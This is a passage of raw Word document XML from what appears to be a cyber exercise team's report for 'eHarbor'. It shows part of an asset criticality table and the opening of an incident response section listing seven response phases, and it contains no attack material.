                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>SimpleCA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42C339FD" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Custom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56947168" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="28D721ED" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DD89258" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Staff-WS1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4872E37B" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A8DB148" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="626B03D5" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="603D43DB" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Staff-WS2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="296122B2" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E7CBCFE" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:keepNext/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FE7389C" w14:textId="16A7A36F" w:rsidR="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005D5567">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Asset criticality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC159C1" w14:textId="3E8B44A1" w:rsidR="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc163900534"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Incident response process</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="35A92207" w14:textId="0B8C4337" w:rsidR="007D15B9" w:rsidRDefault="007D15B9" w:rsidP="007D15B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Incidents can occur in countless ways, so it is infeasible to develop step-by-step instructions for handling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">every incident. Therefore, the aim of the incident response process introduced in this section aims to describe the high-level process followed by eHarbor to respond to any cybersecurity incident. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D6B911" w14:textId="77777777" w:rsidR="002F6F05" w:rsidRDefault="007D15B9" w:rsidP="007D15B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="002F6F05" w:rsidSect="00964D12">
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The following process diagrams illustrate eHarbors approach to responding to the injections of the Red and White Team. The process for handling technical incidents is introduced in Figure 1. Figure 2 illustrates eHarbors response process for social injections. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010B0FB4" w14:textId="77777777" w:rsidR="00F91371" w:rsidRDefault="00DA02ED" w:rsidP="00F91371">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="2608"/>
      </w:pPr>
      <w:r w:rsidRPr="00F93A6E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F4B0B1C" wp14:editId="3DD819F6">
            <wp:extent cx="5424805" cy="5076825"/>
            <wp:effectExtent l="0" t="0" r="4445" b="9525"/>
            <wp:docPr id="141430228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02288" name="Picture 1" descr="A diagram of a company&#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24805" cy="5076825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="135C1C4E" w14:textId="1BF09361" w:rsidR="002F6F05" w:rsidRDefault="00F91371" w:rsidP="00F91371">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00264">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00A00264" w:rsidRPr="00A00264">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00264">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: Technical </w:t>
      </w:r>
      <w:r w:rsidR="00195746">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00264">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ncident </w:t>
      </w:r>
      <w:r w:rsidR="00195746">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00264">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">esponse </w:t>
      </w:r>
      <w:r w:rsidR="00195746">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00264">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A888EBE" w14:textId="77777777" w:rsidR="00A00264" w:rsidRDefault="003C3500" w:rsidP="00A00264">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="2608"/>
      </w:pPr>
      <w:r w:rsidRPr="009051EC">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14E934AC" wp14:editId="08F46150">
            <wp:extent cx="4700905" cy="4706620"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="507554331" name="Picture 2"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54331" name="Picture 2" descr="A diagram of a software process&#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00905" cy="4706620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE9FAC0" w14:textId="1634CE39" w:rsidR="00DA02ED" w:rsidRDefault="00A00264" w:rsidP="00A00264">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D30D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2: Social </w:t>
      </w:r>
      <w:r w:rsidR="00195746">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="002D30D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ncident </w:t>
      </w:r>
      <w:r w:rsidR="00195746">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="002D30D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">esponse </w:t>
      </w:r>
      <w:r w:rsidR="00195746">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="002D30D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629A555D" w14:textId="77777777" w:rsidR="007D15B9" w:rsidRPr="007D15B9" w:rsidRDefault="007D15B9" w:rsidP="007D15B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38868B0E" w14:textId="77777777" w:rsidR="002F6F05" w:rsidRDefault="002F6F05" w:rsidP="00D97E96">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="002F6F05" w:rsidSect="00964D12">
          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape" w:code="9"/>
          <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A484AF" w14:textId="5B6A687C" w:rsidR="002D30D9" w:rsidRPr="008C5F51" w:rsidRDefault="002D30D9" w:rsidP="002D30D9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009051EC">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In principle, the incident response process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidRPr="009051EC">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of eHarbor consists of seven phases:</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2083155A" w14:textId="77777777" w:rsidR="002D30D9" w:rsidRPr="008C5F51" w:rsidRDefault="002D30D9" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD6E733" w14:textId="77777777" w:rsidR="002D30D9" w:rsidRPr="008C5F51" w:rsidRDefault="002D30D9" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527070A2" w14:textId="77777777" w:rsidR="002D30D9" w:rsidRPr="008C5F51" w:rsidRDefault="002D30D9" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9DE047" w14:textId="77777777" w:rsidR="002D30D9" w:rsidRPr="008C5F51" w:rsidRDefault="002D30D9" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Containment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B1CD13" w14:textId="77777777" w:rsidR="002D30D9" w:rsidRPr="008C5F51" w:rsidRDefault="002D30D9" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Eradication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45151E1B" w14:textId="77777777" w:rsidR="002D30D9" w:rsidRPr="008C5F51" w:rsidRDefault="002D30D9" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2771E2F4" w14:textId="0C7DFE1F" w:rsidR="002D30D9" w:rsidRDefault="002D30D9" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Post-incident activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5979E483" w14:textId="77777777" w:rsidR="002D30D9" w:rsidRPr="002D30D9" w:rsidRDefault="002D30D9" w:rsidP="002D30D9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F6411B0" w14:textId="01CB96EA" w:rsidR="002D30D9" w:rsidRPr="008C5F51" w:rsidRDefault="002D30D9" w:rsidP="002D30D9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Phases 4, 5, and 6 are all addressed in Figures 1 and 2 during the “Mitigation plan” phase. This is due to the White Teams request to streamline the incident logging process by using the White Team-created Incident Logging Template. </w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
